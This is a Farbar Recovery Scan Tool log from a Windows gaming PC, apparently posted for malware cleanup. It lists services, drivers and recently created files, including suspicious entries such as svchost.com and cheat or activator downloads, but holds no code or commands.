CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\System Profile [2020-04-20]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AMD External Events Utility; C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atiesrxx.exe [524712 2020-03-18] (Advanced Micro Devices, Inc. -> AMD)
R2 AUEPLauncher; C:\Program Files\AMD\CIM\..\Performance Profile Client\AUEPLauncher.exe [60600 2020-03-17] (Advanced Micro Devices, Inc. -> AMD)
R2 DragonCenter_Service; C:\Program Files (x86)\MSI\Dragon Center\DragonCenter_Service.exe [142512 2019-04-29] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811120 2020-04-22] (EasyAntiCheat Oy -> Epic Games, Inc)
R2 LightKeeperService; C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\LightKeeperService.exe [81552 2019-08-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6933272 2020-03-11] (Malwarebytes Inc -> Malwarebytes)
R2 NahimicService; C:\Windows\system32\NahimicService.exe [1758968 2019-11-28] (A-Volute -> Nahimic)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5930136 2020-04-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\NisSrv.exe [3304992 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MsMpEng.exe [103376 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000 
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 amdgpio2; C:\Windows\System32\drivers\amdgpio2.sys [45832 2019-10-01] (Advanced Micro Devices INC. -> Advanced Micro Devices, Inc)
R3 amdgpio3; C:\Windows\System32\drivers\amdgpio3.sys [24424 2016-08-13] (AMD PMP-PE CB Code Signer v20160415 -> Advanced Micro Devices, Inc)
S3 amdkmcsp; C:\Windows\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 amdkmdag; C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atikmdag.sys [65752488 2020-03-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atikmpag.sys [592296 2020-03-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [102832 2019-09-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 AMDPCIDev; C:\Windows\System32\drivers\AMDPCIDev.sys [31592 2018-04-26] (Advanced Micro Devices Inc. -> Advanced Micro Devices)
R0 amdpsp; C:\Windows\System32\DRIVERS\amdpsp.sys [243048 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R2 AMDRyzenMasterDriver; C:\Program Files\AMD\Performance Profile Client\RyzenMaster\AMDRyzenMasterDriver.sys [70304 2017-11-16] (Advanced Micro Devices, Inc. -> Advanced Micro Devices)
R2 AMDRyzenMasterDriverV14; C:\Program Files\AMD\RyzenMasterSDK\bin\AMDRyzenMasterDriver.sys [70432 2019-07-03] (Advanced Micro Devices INC. -> Advanced Micro Devices)
S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [108152 2019-11-17] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
R1 BadlionAnticheat; C:\Windows\system32\drivers\BadlionAnticheat.sys [2490392 2020-02-26] (Microsoft Windows Hardware Compatibility Publisher -> <Turtle Entertainment>)
S3 BEDaisy; C:\Program Files (x86)\Common Files\BattlEye\BEDaisy.sys [3000688 2020-04-22] (BattlEye Innovations e.K. -> )
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [231936 2019-09-10] (Microsoft Corporation) [File not signed]
R1 EneIo; C:\Windows\system32\drivers\ene.sys [17624 2019-05-22] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 ipadtst; C:\ProgramData\MSI\Super_Charger\ipadtst_64.sys [20464 2013-11-11] (MICRO-STAR INTERNATIONAL CO., LTD. -> Windows ® Win 7 DDK provider)
S3 ipadtst2; C:\ProgramData\MSI\Super_Charger\ipadtst2_64.sys [16336 2016-07-29] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [214496 2020-04-23] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2020-03-11] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [248968 2020-04-23] (Malwarebytes Inc -> Malwarebytes)
R3 Nahimic_Mirroring; C:\Windows\System32\drivers\Nahimic_Mirroring.sys [85592 2020-01-17] (A-Volute -> Windows ® Win 7 DDK provider)
S3 netr28ux; C:\Windows\System32\drivers\netr28ux.sys [2224128 2019-03-19] (Microsoft Windows -> MediaTek Inc.)
R3 NTIOLib_CC_COMM; C:\Program Files (x86)\MSI\Dragon Center\Lib\SYS\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_CC_CPU; C:\Program Files (x86)\MSI\Dragon Center\Lib\Super_Charger\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_MysticLight; C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\Lib\NTIOLib_X64.sys [14288 2019-08-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [662528 2019-03-19] (Microsoft Windows -> Realtek )
S3 tap0901cn; C:\Windows\System32\drivers\tap0901cn.sys [45576 2018-03-20] (Connectify (Connectify, Inc.) -> The OpenVPN Project)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [45960 2020-04-21] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [394680 2020-04-21] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [64944 2020-04-21] (Microsoft Windows -> Microsoft Corporation)
S1 jisbslij; \??\C:\Windows\system32\drivers\jisbslij.sys [X]
S1 kellzdxf; \??\C:\Windows\system32\drivers\kellzdxf.sys [X]
S4 nvvhci; \SystemRoot\System32\drivers\nvvhci.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-04-23 10:14 - 2020-04-23 10:15 - 000032594 _____ C:\Users\ntbea\Downloads\FRST.txt
2020-04-23 10:13 - 2020-04-23 10:14 - 000000000 ____D C:\FRST
2020-04-23 10:13 - 2020-04-23 10:13 - 002282496 _____ (Farbar) C:\Users\ntbea\Downloads\FRST64.exe
2020-04-23 09:42 - 2020-04-23 10:11 - 000041472 _____ C:\Windows\svchost.com
2020-04-23 09:25 - 2020-04-23 09:25 - 000248968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2020-04-23 09:25 - 2020-04-23 09:25 - 000214496 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2020-04-22 22:47 - 2020-04-22 22:47 - 002342912 _____ C:\Users\ntbea\Downloads\MinecraftInstaller (1).msi
2020-04-22 22:33 - 2020-04-22 22:33 - 000000000 ____D C:\Program Files (x86)\EasyAntiCheat
2020-04-22 22:29 - 2020-04-22 22:29 - 000000314 _____ C:\Users\ntbea\Desktop\Fortnite.url
2020-04-22 21:57 - 2020-04-22 21:57 - 000001429 _____ C:\Users\ntbea\Desktop\Roblox Player.lnk
2020-04-22 21:42 - 2020-04-22 21:43 - 000000000 ____D C:\Users\ntbea\.dotnet
2020-04-22 21:42 - 2020-04-22 21:42 - 000001795 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2019.lnk
2020-04-22 21:42 - 2020-04-22 21:42 - 000000000 ____D C:\Program Files (x86)\dotnet
2020-04-22 21:38 - 2020-04-22 21:38 - 000001355 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2020-04-22 21:34 - 2020-04-22 21:57 - 000001244 _____ C:\Users\ntbea\Desktop\Roblox Studio.lnk
2020-04-22 21:33 - 2020-04-22 21:33 - 001555544 _____ (Roblox Corporation) C:\Users\ntbea\Downloads\RobloxPlayerLauncher.exe
2020-04-22 21:31 - 2020-04-22 21:31 - 001394488 _____ (Microsoft Corporation) C:\Users\ntbea\Downloads\vs_community__469491166.1567223716.exe
2020-04-22 21:15 - 2020-04-22 21:15 - 000000000 ____D C:\Program Files\Epic Games
2020-04-22 21:11 - 2020-04-22 21:12 - 000000000 ____D C:\ProgramData\Epic
2020-04-22 21:11 - 2020-04-22 21:11 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2020-04-22 21:11 - 2020-04-22 21:11 - 000001258 _____ C:\Users\Public\Desktop\Epic Games Launcher.lnk
2020-04-22 21:11 - 2020-04-22 21:11 - 000001258 _____ C:\ProgramData\Desktop\Epic Games Launcher.lnk
2020-04-22 21:11 - 2020-04-22 21:11 - 000000000 ____D C:\Program Files (x86)\Epic Games
2020-04-22 21:10 - 2020-04-22 21:11 - 000000000 ____D C:\Users\ntbea\AppData\Local\EpicGamesLauncher
2020-04-22 14:40 - 2020-04-22 14:41 - 000579434 _____ C:\Users\ntbea\Desktop\Synapse-X.zip
2020-04-22 14:14 - 2020-04-22 14:14 - 044081152 _____ C:\Users\ntbea\Downloads\EpicInstaller-10.15.2-unrealtournament.msi
2020-04-22 10:43 - 2020-04-22 15:17 - 000002550 _____ C:\Users\ntbea\Desktop\Rkill.txt
2020-04-22 10:43 - 2020-04-22 10:43 - 001802704 _____ (Bleeping Computer, LLC) C:\Users\ntbea\Downloads\rkill.exe
2020-04-22 09:58 - 2020-04-23 10:11 - 000000095 _____ C:\Windows\directx.sys
2020-04-21 17:25 - 2020-04-22 11:01 - 000000000 ____D C:\Users\ntbea\Desktop\Buffalo Haxx
2020-04-21 17:14 - 2020-04-21 17:14 - 000002480 _____ C:\Users\ntbea\Desktop\aimbot.txt
2020-04-21 16:48 - 2020-04-21 16:48 - 000013824 _____ () C:\Users\ntbea\Downloads\WeAreDevs_API.dll
2020-04-21 11:08 - 2020-04-21 11:08 - 000011894 _____ C:\Users\ntbea\Downloads\Night Vision Pack 1.0.3.mcpack
2020-04-21 11:07 - 2020-04-21 11:07 - 000032524 _____ C:\Users\ntbea\Downloads\x-ray-direct-download (1).mcpack
2020-04-21 11:03 - 2020-04-21 11:03 - 007290144 _____ C:\Users\ntbea\Downloads\Xray pack V2.0.mcpack
2020-04-21 11:01 - 2020-04-21 11:01 - 000032524 _____ C:\Users\ntbea\Downloads\x-ray-direct-download.mcpack
2020-04-20 14:41 - 2020-04-22 22:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft Launcher
2020-04-20 14:41 - 2020-04-20 14:41 - 002342912 _____ C:\Users\ntbea\Downloads\MinecraftInstaller.msi
2020-04-20 14:01 - 2020-04-20 14:41 - 000000000 ____D C:\Users\ntbea\Downloads\DiscordNitroGeneratorV2
2020-04-20 11:22 - 2020-04-20 11:23 - 026481424 _____ (Python Software Foundation) C:\Users\ntbea\Downloads\python-3.8.2.exe
2020-04-20 11:08 - 2020-04-20 11:08 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Microsoft Teams
2020-04-20 10:37 - 2020-04-20 10:37 - 000000000 ____D C:\Users\ntbea\AppData\Local\SkinSoft
2020-04-19 17:42 - 2020-04-19 17:42 - 000000000 ____D C:\Users\ntbea\Desktop\Windows10Activator
2020-04-19 17:37 - 2020-04-19 17:37 - 000001416 _____ C:\Users\ntbea\Downloads\Windows10Activator.rar
2020-04-18 19:18 - 2020-04-18 19:18 - 029998640 _____ (JetBrains) C:\Users\ntbea\Downloads\JetBrains.dotPeek.2020.1.web.exe
2020-04-18 18:16 - 2020-04-18 18:16 - 000034091 _____ C:\Users\ntbea\Downloads\JailedCat Script - Linkvertise.txt
2020-04-18 11:18 - 2020-04-19 11:18 - 000002476 _____ C:\Users\ntbea\Desktop\The3EyedGamer - (The3EyedGamer - Exploits) - Chrome.lnk
2020-04-17 17:11 - 2020-04-17 17:12 - 000000181 _____ C:\Users\ntbea\Desktop\change hwid.txt
2020-04-16 21:49 - 2020-04-16 21:49 - 002426464 _____ C:\Users\ntbea\Downloads\Chocapic13_V8_Ultra.zip
2020-04-16 21:39 - 2020-04-16 21:40 - 005434242 _____ C:\Users\ntbea\Downloads\preview_OptiFine_1.15.2_HD_U_G1_pre13.jar
2020-04-16 12:45 - 2020-04-16 12:45 - 000000000 ____D C:\Users\ntbea\Downloads\fortnitepy-bot-master
2020-04-16 12:45 - 2020-04-16 12:45 - 000000000 ____D C:\Users\ntbea\Desktop\fortnitepy-bot-master
2020-04-16 12:42 - 2020-04-16 12:43 - 031505640 _____ (Python Software Foundation) C:\Users\ntbea\Downloads\python-3.6.0-amd64.exe
2020-04-16 12:42 - 2020-04-16 12:42 - 000015962 _____ C:\Users\ntbea\Downloads\fortnitepy-bot-master.zip
2020-04-15 16:46 - 2020-04-15 16:46 - 025444352 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 019850240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 019812864 _____ (Microsoft Corporation) C:\Windows\system32\HologramWorld.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 018027520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 007017472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 005910016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 004129624 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 003512320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002951832 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002800640 _____ (Microsoft Corporation) C:\Windows\system32\WinSAT.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 002494744 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002369576 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.AppAgent.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002188600 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystems64.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002180408 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001870408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001659408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.AppAgent.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001610240 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001545216 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 001495864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppVEntSubsystems32.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001386296 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystemController.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001310720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjet40.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001264640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 001151816 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001013000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000983040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000835584 _____ (Microsoft Corporation) C:\Windows\system32\WorkfoldersControl.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000744960 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2013CustomActions.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.Internal.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000525312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsecedit.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000514560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000456192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appwiz.cpl
2020-04-15 16:46 - 2020-04-15 16:46 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\MSFlacDecoder.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000420152 _____ (Microsoft Corporation) C:\Windows\system32\MSAudDecMFT.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000380416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSFlacDecoder.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msexcl40.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000321536 _____ (Microsoft Corporation) C:\Windows\system32\wbadmin.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 000241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msltus40.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000225792 _____ (Microsoft Corporation) C:\Windows\system32\WorkFoldersShell.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasrad.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.XamlHost.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000178176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srumsvc.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000175616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IndexedDbLegacy.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.XamlHost.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000117248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakradiag.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000105472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakrathunk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000105472 _____ (Microsoft Corporation) C:\Windows\system32\WorkFolders.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasacct.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srumapi.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2010CustomActions.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iaspolcy.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2010CustomActions.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ias.dll
2020-04-15 16:45 - 2020-04-15 16:46 - 000090624 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 022636544 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 017790464 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 014818816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 009930552 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 008013824 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 007849216 _____ (Microsoft Corporation) C:\Windows\system32\OneCoreUAPCommonProxyStub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 007756800 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 007604584 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 006523048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 006168064 _____ (Microsoft Corporation) C:\Windows\system32\twinui.pcshell.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 005040640 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 004611584 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 004563200 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 004538880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003980800 _____ (Microsoft Corporation) C:\Windows\system32\tellib.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003802624 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003753472 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003742544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003729408 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 003708928 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003587384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 003547648 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003109376 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002986808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 002871608 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 002800128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 002767928 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002717184 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 002453504 _____ (Microsoft Corporation) C:\Windows\system32\InstallService.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002131456 _____ (Microsoft Corporation) C:\Windows\system32\WpcDesktopMonSvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002126144 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002114560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.CloudStore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002086656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001999960 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001960448 _____ (Microsoft Corporation) C:\Windows\system32\aadtb.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001945600 _____ (Microsoft Corporation) C:\Windows\system32\dcomp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001942528 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001918976 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001835008 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001783296 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001764336 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001762816 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001757096 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-04-15 16:45 - 2020-04-15 16:45 - 001729024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallService.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001726264 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001719808 _____ (Microsoft Corporation) C:\Windows\system32\Wpc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001697792 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001665216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001664896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001656904 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001646048 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001612800 _____ (Microsoft Corporation) C:\Windows\system32\wpncore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001603584 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001587712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aadtb.dll
